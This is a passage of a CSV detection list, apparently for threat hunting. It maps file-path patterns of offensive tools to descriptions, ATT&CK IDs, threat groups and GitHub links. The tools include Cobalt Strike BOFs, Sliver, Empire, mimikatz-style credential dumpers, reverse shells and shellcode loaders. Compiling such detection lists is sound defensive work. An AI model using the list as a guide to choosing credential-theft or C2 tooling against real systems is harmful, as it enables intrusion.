TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,0,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/SilentClean/SilentClean/*.cs*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*/silentdump.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/silentdump.h*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/SilentHound.git*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,1,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*/SilentMoonwalk.git*,offensive_tool_keyword,SilentMoonwalk,PoC Implementation of a fully dynamic call stack spoofer,T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/klezVirus/SilentMoonwalk,1,1,N/A,9,6,507,84,2022-12-08T10:01:41Z,2022-12-04T13:30:33Z -*/silentprocessexit.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/silenttrinity/*.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*/simple_hijacker/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/SimpleLoader.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/SimpleLoader.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*/Simple-Reverse-Shell*,offensive_tool_keyword,Simple-Reverse-Shell,Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication,T1548 - T1562 - T1027,TA0003 - TA0008,N/A,N/A,Shell spawning,https://github.com/tihanyin/Simple-Reverse-Shell/,1,1,N/A,N/A,2,114,30,2021-12-21T15:51:48Z,2021-12-19T22:16:32Z -*/SimplyEmail.git*,offensive_tool_keyword,SimplyEmail,SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.,T1210.001 - T1190 - T1583.001 - T1590,TA0007 - TA0002 - ,N/A,N/A,Reconnaissance,https://github.com/SimplySecurity/SimplyEmail,1,1,N/A,5,10,918,242,2023-01-12T22:20:25Z,2015-10-30T03:12:10Z -*/sip-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-call-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sip-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Sitadel.git*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sitadel.log*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sitadel.py*,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,1,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -*/sites-available/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/sites-enabled/striker*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/situational_awareness/*.exe,offensive_tool_keyword,empire,Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/situational_awareness/*.ps1,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/skelsec/pypykatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,1,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/skypev2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Slackor.git*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/Slackor/*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/sleep_python_bridge/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/Sleeper/Sleeper.cna*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/sleepmask.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/SlinkyCat.git*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*/sliver.git*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver.pb.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver.proto*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver/evasion/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver-server*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/smb.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb/psexec.rb*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/SMB_RPC/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb2-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-vuln-uptime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb3.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 